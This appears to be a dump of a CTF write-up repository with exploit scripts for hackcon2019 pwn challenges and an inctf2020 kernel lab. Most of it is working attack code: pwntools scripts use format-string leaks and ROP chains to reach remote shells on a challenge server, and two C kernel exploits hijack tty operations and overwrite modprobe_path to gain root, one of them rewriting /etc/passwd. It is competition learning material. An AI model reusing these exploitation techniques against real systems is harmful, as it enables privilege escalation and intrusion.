2 | Service : nc 68.183.158.95 8991 3 | 4 | -------------------------------------------------------------------------------- /hackcon2019/pwn/Not_So_Easy_B0f/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.log_level ='critical' 4 | 5 | e = ELF('./q3') 6 | #p = process('./q3') 7 | p = remote('68.183.158.95',8991) 8 | p.recvuntil(': ',timeout=0.2) 9 | p.sendline('%3$p|%11$p') 10 | p.recvline() 11 | leak = p.recvline().strip().split('|') 12 | canary = int(leak[1],16) 13 | libc = int(leak[0],16)-0xf72b0-0x10 14 | print canary,hex(libc) 15 | payload = "A"*24+p64(canary)+"A"*8+p64(0x45216+libc) 16 | p.recvuntil(': ',timeout=1) 17 | p.sendline(payload) 18 | p.interactive() 19 | -------------------------------------------------------------------------------- /hackcon2019/pwn/Not_So_Easy_B0f/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/hackcon2019/pwn/Not_So_Easy_B0f/libc.so.6 -------------------------------------------------------------------------------- /hackcon2019/pwn/Not_So_Easy_B0f/q3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/hackcon2019/pwn/Not_So_Easy_B0f/q3 -------------------------------------------------------------------------------- /hackcon2019/pwn/babyb0f/README.md: -------------------------------------------------------------------------------- 1 | It's a b0f , Can't be easier than that. 
2 | 3 | Service : nc 68.183.158.95 8989 4 | 5 | -------------------------------------------------------------------------------- /hackcon2019/pwn/babyb0f/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | from pwn import * 3 | from time import sleep 4 | context(arch="amd64",os="linux") 5 | #p = process('./q1') 6 | p = remote('68.183.158.95',8989) 7 | libc = ELF('./libc.so.6') 8 | bin = ELF('./q1') 9 | puts_got = bin.got['puts'] 10 | puts_plt = bin.plt['puts'] 11 | payload = "A"*22 12 | payload += p64(bin.search(asm('pop rdi;ret')).next()) 13 | payload += p64(puts_got) 14 | payload += p64(puts_plt) 15 | payload += p64(bin.symbols['main']) 16 | sleep(1) 17 | log.success("sending payload") 18 | p.sendline(payload) 19 | p.recvuntil('Again\n',timeout=1) 20 | leak = u64(p.recvline().strip()+"\x00"*2) 21 | log.success("leaked puts at: "+hex(leak)) 22 | lba = leak - libc.symbols['puts'] 23 | log.success("libc base address calculated at: "+hex(lba)) 24 | sleep(1) 25 | payload = "A"*22 26 | payload += p64(0x45216+lba) #one_gadget 27 | p.sendline(payload) 28 | p.interactive() 29 | -------------------------------------------------------------------------------- /hackcon2019/pwn/babyb0f/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/hackcon2019/pwn/babyb0f/libc.so.6 -------------------------------------------------------------------------------- /hackcon2019/pwn/babyb0f/q1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/hackcon2019/pwn/babyb0f/q1 -------------------------------------------------------------------------------- /hackcon2019/pwn/babypwn/README.md: -------------------------------------------------------------------------------- 1 | 
You don't need eip control for every pwn. 2 | Service : nc 68.183.158.95 8990 3 | -------------------------------------------------------------------------------- /hackcon2019/pwn/babypwn/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #p = process('./q2') 4 | p = remote('68.183.158.95',8990) 5 | e = ELF('./q2') 6 | 7 | win = e.symbols['win'] 8 | payload = p64(win)+p64(0xFFFFFFFE00000000)+"\n"*6 9 | p.sendline(payload) 10 | p.interactive() 11 | -------------------------------------------------------------------------------- /hackcon2019/pwn/babypwn/q2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/hackcon2019/pwn/babypwn/q2 -------------------------------------------------------------------------------- /inctf2020/Lab9/.gdb_history: -------------------------------------------------------------------------------- 1 | c 2 | p $rax 3 | add-symbol-file mod.ko 0xffffffffc0000000 4 | target remote 127.0.0.1:6789 5 | b device_ioctl 6 | c 7 | ni 8 | add-symbol-file mod.ko 0xffffffffc0000000 9 | target remote 127.0.0.1:6789 10 | b device_ioctl 11 | c 12 | ni 13 | p $rdi 14 | p $rax 15 | ni 16 | add-symbol-file mod.ko 0xffffffffc0000000 17 | target remote 127.0.0.1:6789 18 | b device_ioctl 19 | c 20 | c 21 | ni 22 | p $rdi 23 | ni 24 | p $rdi 25 | ni 26 | b*0xffffffffc00001c6 27 | delete breakpoints 28 | b*0xffffffffc00001c6 29 | p $rax 30 | x/xg 0xffff880006080480 31 | c 32 | add-symbol-file mod.ko 0xffffffffc0000000 33 | b*0xffffffffc00001c6 34 | add-symbol-file mod.ko 0xffffffffc0000000 35 | target remote 127.0.0.1:6789 36 | b device_ioctl 37 | c 38 | c 39 | delete breakpoints 40 | b*0xffffffffc00001c6 41 | c 42 | ni 43 | p $rax 44 | c 45 | ni 46 | p $rax 47 | c 48 | p $rax 49 | ni 50 | p $rax 51 | add-symbol-file mod.ko 0xffffffffc0000000 52 | target remote 
127.0.0.1:6789 53 | b device_ioctl 54 | c 55 | ni 56 | ni 57 | ni 58 | p $rax 59 | add-symbol-file mod.ko 0xffffffffc0000000 60 | target remote 127.0.0.1:6789 61 | b device_ioctl 62 | c 63 | ni 64 | p $rdi 65 | p $rdi 66 | p $rsi 67 | si 68 | ni 69 | ni 70 | nx/xg $rdi 71 | x/xg $rdi 72 | ni 73 | ni 74 | p $rax 75 | ni 76 | p $rax 77 | x/xg $rbx 78 | add-symbol-file mod.ko 0xffffffffc0000000 79 | target remote 127.0.0.1:6789 80 | b device_ioctl 81 | c 82 | ni 83 | b*0xffffffffc00002de 84 | c 85 | c 86 | c 87 | c 88 | c 89 | ni 90 | ni 91 | p $esi 92 | ni 93 | c 94 | p $esi 95 | c 96 | p $esi 97 | ni 98 | p $esi 99 | ni 100 | p $rdi 101 | ni 102 | x/xg 0xffffc900000cfe60 103 | c 104 | ni 105 | p $rsi 106 | p $rax 107 | target remote 127.0.0.1:6789 108 | add-symbol-file mod.ko 0xffffffffc0000000 109 | target remote 127.0.0.1:6789 110 | add-symbol-file mod.ko 0xffffffffc0000000 111 | b device_ioctl 112 | c 113 | ni 114 | ni 115 | p $rax 116 | ni 117 | ni 118 | x/xg $rdi 119 | x/xg $rdx 120 | target remote 127.0.0.1:6789 121 | add-symbol-file mod.ko 0xffffffffc0000000 122 | b device_mmap 123 | c 124 | p $rdi 125 | c 126 | add-symbol-file mod.ko 0xffffffffc0000000 127 | target remote 127.0.0.1:6789 128 | b device_mmap 129 | c 130 | ni 131 | ni 132 | p $rdi 133 | ni 134 | ni 135 | p $r8 136 | p $rsi 137 | ni 138 | add-symbol-file mod.ko 0xffffffffc0000000 139 | target remote 127.0.0.1:6789 140 | b device_mmap 141 | c 142 | ni 143 | p $rcx 144 | p $r9 145 | ni 146 | p $rxc 147 | p $rxc 148 | p $rcx 149 | p $rax 150 | ni 151 | p $rax 152 | p $rsi 153 | x/xg $rdx 154 | set $rsi=0x2000 155 | ni 156 | c 157 | add-symbol-file mod.ko 0xffffffffc0000000 158 | target remote 127.0.0.1:6789 159 | b device_mmap 160 | c 161 | ni 162 | p $rdx 163 | x/xg 0xffff8800060808e0 164 | p 0x0000000000003338 ^ 0x2000 165 | add-symbol-file mod.ko 0xffffffffc0000000 166 | target remote 127.0.0.1:6789 167 | b*ffffffff813fe7f0 168 | b*0xffffffff813fe7f0 169 | c 170 | p $rdi 171 | x/8gx 
0xffff8800072b3800 172 | x/i 0xffff8800072b3800 173 | x/xg 0xffff8800072b3800 174 | x/i 0xffffffff81a5f260 175 | x/xg 0xffffffff81a5f260 176 | x/8gx 0xffff8800072b3800 177 | ls 178 | add-symbol-file mod.ko 0xffffffffc0000000 179 | target remote 127.0.0.1:6789 180 | b*0xffffffff813fe7f0 181 | c 182 | p $rdi 183 | p $rsi 184 | p $rdx 185 | p $rdi 186 | x/8xg 0xffff8800072b3800 187 | x/16gx 0xffffffff81a5f260 188 | add-symbol-file mod.ko 0xffffffffc0000000 189 | target remote 127.0.0.1:6789 190 | b*0xffffffffaa9fe7f0 191 | x/xg 0xffffffffaa9fe7f0 192 | c 193 | p $rdi 194 | x/8gx 0xffff9034460da000 195 | vmmap 196 | x//i 0xffffffff818e7bdb 197 | x/i 0xffffffff818e7bdb 198 | p 0xffffffff818e7bdb-0xffffffff81000000 199 | p shell 200 | add-symbol-file mod.ko 0xffffffffc0000000 201 | add-symbol-file mod.ko 0xffffffffc0000000 202 | target remote 127.0.0.1:6789 203 | x/i 0xffffffffbbae7bdb 204 | b*0xffffffffbbae7bdb 205 | c 206 | si 207 | p $rsp 208 | x/xg 0xf6000000 209 | vmmap 210 | add-symbol-file mod.ko 0xffffffffc0000000 211 | target remote 127.0.0.1:6789 212 | b*0xffffffffb04e7bdb 213 | c 214 | si 215 | add-symbol-file mod.ko 0xffffffffc0000000 216 | target remote 127.0.0.1:6789 217 | b*0xffffffffa20e7bdb 218 | c 219 | si 220 | c 221 | x/i 0xffffffff813707e8 222 | add-symbol-file mod.ko 0xffffffffc0000000 223 | target remote 127.0.0.1:6789 224 | b*0xffffffffb84e7bdb 225 | c 226 | c 227 | add-symbol-file mod.ko 0xffffffffc0000000 228 | target remote 127.0.0.1:6789 229 | b*0xffffffff9e2e7bdb 230 | c 231 | si 232 | finish 233 | p $rdi 234 | p $rax 235 | si 236 | finish 237 | si 238 | p $rdi 239 | p $rdx 240 | si 241 | si 242 | p $rdx 243 | x/i 0xffffffff813707eb: 244 | x/i 0xffffffff813707eb 245 | add-symbol-file mod.ko 0xffffffffc0000000 246 | target remote 127.0.0.1:6789 247 | add-symbol-file mod.ko 0xffffffffc0000000 248 | target remote 127.0.0.1:6789 249 | target remote 127.0.0.1:6789 250 | target remote 127.0.0.1:6789 251 | x/i 0xffffffff98740967 252 | searchmem 
/sbin/modprobe 253 | vmmap 254 | searchmem /sbin/modprobe 0xffffffff81967b20 255 | searchmem /sbin/modprobe 0xffffffff81a00000 256 | searchmem /sbin/modprobe 0xffffffff81a00000 0xffffffff8215c000 257 | -------------------------------------------------------------------------------- /inctf2020/Lab9/add.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | cd fs 3 | cp ../$1 . 4 | find . -print0 | cpio --null -ov --format=newc > ../rootfs.cpio 5 | -------------------------------------------------------------------------------- /inctf2020/Lab9/bzImage: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/inctf2020/Lab9/bzImage -------------------------------------------------------------------------------- /inctf2020/Lab9/exploit: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/inctf2020/Lab9/exploit -------------------------------------------------------------------------------- /inctf2020/Lab9/exploit.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | 13 | #define ull unsigned long long 14 | #define LOCK_BOX 0x1337 15 | #define UNLOCK_BOX 0x1338 16 | #define SET_BOX 0x1339 17 | #define RESIZE_BOX 0x133a 18 | #define box_unlock() box_lock() 19 | #define sBox struct box 20 | #define commit_creds kbase + 0x80010 21 | #define prepare_kernel_cred kbase + 0x803e0 22 | #define stack_pivot_gadget kbase + 0x8e7bdb 23 | // mov esp,0xf6000000; ret 24 | #define pop_rdi_ret kbase + 0x3707ec 25 | #define pop_rdx_rdi_ret kbase + 0x3707eb 26 | #define pop_rsi_ret kbase + 0x1f1b5 27 | #define mov_rdi_rax 
kbase + 0x8e21c 28 | #define fchmodat kbase + 0x190cc0 29 | #define msleep kbase + 0xbc9e0 30 | 31 | 32 | struct box { 33 | uint64_t size; 34 | uint64_t key; 35 | void * ptr; 36 | } Box; 37 | 38 | int fd; 39 | 40 | int box_lock() 41 | { 42 | return ioctl(fd, LOCK_BOX, &Box.key); 43 | } 44 | 45 | int box_set(ull key) 46 | { 47 | Box.key = key; 48 | return ioctl(fd, SET_BOX, &Box.key); 49 | } 50 | 51 | int box_resize(uint64_t size) 52 | { 53 | Box.size = size; 54 | return ioctl(fd, RESIZE_BOX, &Box.size); 55 | } 56 | 57 | void * dev_mmap(void * addr, uint64_t size) 58 | { 59 | void * _addr = mmap(addr, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0); 60 | return _addr; 61 | } 62 | 63 | void shell() 64 | { 65 | puts("[+] Waiting"); 66 | sleep(5); 67 | char * passwd = "root:6yJpcMmL6GY4c:0:0:root:/root:/bin/sh\nuser:x:1000:1000:Linux User,,,:/home/user:/bin/sh"; 68 | int pfd = open("/etc/passwd", O_WRONLY); 69 | write(pfd, passwd, strlen(passwd)); 70 | close(pfd); 71 | puts("[+] Login with password: toor"); 72 | system("/bin/sh"); 73 | } 74 | char * fake_stack = NULL; 75 | void exploit() 76 | { 77 | pthread_t p_thread; 78 | box_set(0x2000); 79 | int ptmx[0x30]; 80 | for(int i=0;i<0x30;++i) 81 | ptmx[i] = open("/dev/ptmx", O_RDWR|O_NOCTTY); 82 | for(int i=0;i<3;++i) 83 | box_resize(24); 84 | int fds[0x20]; 85 | int bak = fd; 86 | for(int i=0;i<0x20;++i) 87 | { 88 | fds[i] = open("/dev/mod", O_RDWR); 89 | fd = fds[i]; 90 | box_set(0x1337+i); 91 | box_resize(0x400); 92 | } 93 | fd = bak; 94 | Box.key = 0x2000; 95 | ull * addr = 0x13370000LL; 96 | box_lock(); 97 | for(int i=0;i<0x20;++i) 98 | { 99 | fd = fds[i]; 100 | Box.key = 0x1337+i; 101 | if(box_lock() == -1) 102 | { 103 | box_unlock(); 104 | printf("Found at idx: %d\n", i); 105 | dev_mmap(0x13370000LL, 0x2000); 106 | fd = bak; 107 | Box.key = 0x2000; 108 | box_unlock(); 109 | break; 110 | } 111 | box_unlock(); 112 | } 113 | 114 | ull ptm_ops = NULL; 115 | int i; 116 | for(i=0;i<0x2000/8;++i) 117 | { 118 | 
if((addr[i] & 0xffff) == 0xf260) 119 | { 120 | ptm_ops = addr[i]; 121 | break; 122 | } 123 | } 124 | if(!ptm_ops) 125 | { 126 | puts("Run again"); 127 | exit(1); 128 | } 129 | pthread_create(&p_thread, NULL, shell, NULL); 130 | ull kbase = ptm_ops - 0xa5f260; 131 | printf("[+] kernel base: %p\n", kbase); 132 | int idx = 0; 133 | ull * ropchain = 0xf6000000; 134 | char *file = "/etc/passwd"; 135 | ropchain[idx++] = pop_rdi_ret; 136 | ropchain[idx++] = 0; 137 | ropchain[idx++] = prepare_kernel_cred; 138 | ropchain[idx++] = mov_rdi_rax; 139 | ropchain[idx++] = commit_creds; 140 | ropchain[idx++] = pop_rdx_rdi_ret; 141 | ropchain[idx++] = 0777; 142 | ropchain[idx++] = 0; 143 | ropchain[idx++] = pop_rsi_ret; 144 | ropchain[idx++] = file; 145 | ropchain[idx++] = fchmodat; 146 | ropchain[idx++] = pop_rdi_ret; 147 | ropchain[idx++] = 0x100000; 148 | ropchain[idx++] = msleep; 149 | ull * fake_ops = malloc(0x400); 150 | memset((void *)fake_ops, 0, 0x400); 151 | fake_ops[12] = stack_pivot_gadget; // ptm_unix98_ops.ioctl 152 | addr[i] = (void *)fake_ops; 153 | for(int i=0;i<0x30;++i) 154 | ioctl(ptmx[i], 0xdeadbeef, 0xdeadbeef); 155 | } 156 | 157 | int main() { 158 | fd = open("/dev/mod", O_RDWR); 159 | assert(fd > 0); 160 | fake_stack = mmap(0xf6000000-0x50000, 0x100000, 0x7, 0x32 | MAP_POPULATE | MAP_FIXED | MAP_GROWSDOWN, -1, 0); 161 | exploit(); 162 | close(fd); 163 | } 164 | -------------------------------------------------------------------------------- /inctf2020/Lab9/exploit_modprobe_path: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/inctf2020/Lab9/exploit_modprobe_path -------------------------------------------------------------------------------- /inctf2020/Lab9/exploit_modprobe_path.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 
#include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | #define ull unsigned long long 13 | #define LOCK_BOX 0x1337 14 | #define UNLOCK_BOX 0x1338 15 | #define SET_BOX 0x1339 16 | #define RESIZE_BOX 0x133a 17 | #define box_unlock() box_lock() 18 | #define sBox struct box 19 | #define commit_creds kbase + 0x80010 20 | #define prepare_kernel_cred kbase + 0x803e0 21 | #define stack_pivot_gadget kbase + 0x8e7bdb 22 | // mov esp,0xf6000000; ret 23 | #define pop_rdi_ret kbase + 0x3707ec 24 | #define pop_rdx_rdi_ret kbase + 0x3707eb 25 | #define pop_rsi_ret kbase + 0x1f1b5 26 | #define mov_rdi_rax kbase + 0x8e21c 27 | #define fchmodat kbase + 0x190cc0 28 | #define msleep kbase + 0xbc9e0 29 | #define modprobe_path kbase + 0xe42a00 30 | #define mov_qword_rdx_rsi kbase + 0x340967 31 | 32 | struct box { 33 | uint64_t size; 34 | uint64_t key; 35 | void * ptr; 36 | } Box; 37 | 38 | int fd; 39 | 40 | int box_lock() 41 | { 42 | return ioctl(fd, LOCK_BOX, &Box.key); 43 | } 44 | 45 | int box_set(ull key) 46 | { 47 | Box.key = key; 48 | return ioctl(fd, SET_BOX, &Box.key); 49 | } 50 | 51 | int box_resize(uint64_t size) 52 | { 53 | Box.size = size; 54 | return ioctl(fd, RESIZE_BOX, &Box.size); 55 | } 56 | 57 | void * dev_mmap(void * addr, uint64_t size) 58 | { 59 | void * _addr = mmap(addr, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0); 60 | return _addr; 61 | } 62 | 63 | 64 | void shell() 65 | { 66 | puts("[+] r00000t"); 67 | system("echo '#!/bin/sh' > /home/user/x; echo 'setsid cttyhack setuidgid 0 /bin/sh' >> /home/user/x"); 68 | system("chmod +x /home/user/x"); 69 | int ff = open("/home/user/ffff", O_WRONLY|O_CREAT); 70 | write(ff, "\xff\xff\xff\xff", 4); 71 | close(ff); 72 | system("chmod 777 /home/user/ffff; /home/user/ffff"); 73 | system("sh"); 74 | } 75 | 76 | void exploit() 77 | { 78 | pthread_t p_thread; 79 | box_set(0x2000); 80 | int ptmx[0x30]; 81 | for(int i=0;i<0x30;++i) 82 | ptmx[i] = open("/dev/ptmx", O_RDWR|O_NOCTTY); 83 | for(int i=0;i<3;++i) 84 | 
box_resize(24); 85 | int fds[0x20]; 86 | int bak = fd; 87 | for(int i=0;i<0x20;++i) 88 | { 89 | fds[i] = open("/dev/mod", O_RDWR); 90 | fd = fds[i]; 91 | box_set(0x1337+i); 92 | box_resize(0x400); 93 | } 94 | fd = bak; 95 | Box.key = 0x2000; 96 | ull * addr = 0x13370000LL; 97 | box_lock(); 98 | for(int i=0;i<0x20;++i) 99 | { 100 | fd = fds[i]; 101 | Box.key = 0x1337+i; 102 | if(box_lock() == -1) 103 | { 104 | box_unlock(); 105 | printf("Found at idx: %d\n", i); 106 | dev_mmap(0x13370000LL, 0x2000); 107 | fd = bak; 108 | Box.key = 0x2000; 109 | box_unlock(); 110 | break; 111 | } 112 | box_unlock(); 113 | } 114 | 115 | ull ptm_ops = NULL; 116 | int i; 117 | for(i=0;i<0x2000/8;++i) 118 | { 119 | if((addr[i] & 0xffff) == 0xf260) 120 | { 121 | ptm_ops = addr[i]; 122 | break; 123 | } 124 | } 125 | if(!ptm_ops) 126 | { 127 | puts("Run again"); 128 | exit(1); 129 | } 130 | ull kbase = ptm_ops - 0xa5f260; 131 | printf("[+] kernel base: %p\n", kbase); 132 | ull * fake_ops = malloc(0x400); 133 | memset((void *)fake_ops, 0, 0x400); 134 | fake_ops[12] = mov_qword_rdx_rsi; // ptm_unix98_ops.ioctl 135 | addr[i] = (void *)fake_ops; 136 | for(int idx=0;idx<0x30;++idx) 137 | { 138 | ioctl(ptmx[idx], 0x6d6f682f, modprobe_path); 139 | ioctl(ptmx[idx], 0x73752f65, modprobe_path+4); 140 | ioctl(ptmx[idx], 0x782f7265, modprobe_path+8); 141 | } 142 | addr[i] = ptm_ops; 143 | shell(); 144 | } 145 | 146 | int main() { 147 | fd = open("/dev/mod", O_RDWR); 148 | assert(fd > 0); 149 | exploit(); 150 | close(fd); 151 | } 152 | -------------------------------------------------------------------------------- /inctf2020/Lab9/extract-vmlinux: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # SPDX-License-Identifier: GPL-2.0-only 3 | # ---------------------------------------------------------------------- 4 | # extract-vmlinux - Extract uncompressed vmlinux from a kernel image 5 | # 6 | # Inspired from extract-ikconfig 7 | # (c) 2009,2010 Dick 
Streefland 8 | # 9 | # (c) 2011 Corentin Chary 10 | # 11 | # ---------------------------------------------------------------------- 12 | 13 | check_vmlinux() 14 | { 15 | # Use readelf to check if it's a valid ELF 16 | # TODO: find a better to way to check that it's really vmlinux 17 | # and not just an elf 18 | readelf -h $1 > /dev/null 2>&1 || return 1 19 | 20 | cat $1 21 | exit 0 22 | } 23 | 24 | try_decompress() 25 | { 26 | # The obscure use of the "tr" filter is to work around older versions of 27 | # "grep" that report the byte offset of the line instead of the pattern. 28 | 29 | # Try to find the header ($1) and decompress from here 30 | for pos in `tr "$1\n$2" "\n$2=" < "$img" | grep -abo "^$2"` 31 | do 32 | pos=${pos%%:*} 33 | tail -c+$pos "$img" | $3 > $tmp 2> /dev/null 34 | check_vmlinux $tmp 35 | done 36 | } 37 | 38 | # Check invocation: 39 | me=${0##*/} 40 | img=$1 41 | if [ $# -ne 1 -o ! -s "$img" ] 42 | then 43 | echo "Usage: $me " >&2 44 | exit 2 45 | fi 46 | 47 | # Prepare temp files: 48 | tmp=$(mktemp /tmp/vmlinux-XXX) 49 | trap "rm -f $tmp" 0 50 | 51 | # That didn't work, so retry after decompression. 52 | try_decompress '\037\213\010' xy gunzip 53 | try_decompress '\3757zXZ\000' abcde unxz 54 | try_decompress 'BZh' xy bunzip2 55 | try_decompress '\135\0\0\0' xxx unlzma 56 | try_decompress '\211\114\132' xy 'lzop -d' 57 | try_decompress '\002!L\030' xxx 'lz4 -d' 58 | try_decompress '(\265/\375' xxx unzstd 59 | 60 | # Finally check for uncompressed images or objects: 61 | check_vmlinux $img 62 | 63 | # Bail out: 64 | echo "$me: Cannot find vmlinux." 
>&2 65 | -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/[: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/[[: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/acpid: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/add-shell: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/addgroup: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/adduser: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/adjtimex: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/arp: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/arping: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ash: 
-------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/awk: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/base64: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/basename: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/beep: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/blkid: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/blockdev: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/bootchartd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/brctl: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/bunzip2: -------------------------------------------------------------------------------- 1 | busybox 
-------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/busybox: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/inctf2020/Lab9/fs/bin/busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/bzcat: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/bzip2: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/cal: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/cat: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/catv: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/chat: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/chattr: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/chgrp: -------------------------------------------------------------------------------- 1 | busybox 
-------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/chmod: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/chown: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/chpasswd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/chpst: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/chroot: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/chrt: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/chvt: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/cksum: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/clear: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/cmp: 
-------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/comm: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/conspy: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/cp: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/cpio: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/crond: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/crontab: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/cryptpw: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/cttyhack: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/cut: -------------------------------------------------------------------------------- 1 | busybox 
-------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/date: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/dc: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/dd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/deallocvt: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/delgroup: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/deluser: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/depmod: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/devmem: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/df: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/dhcprelay: 
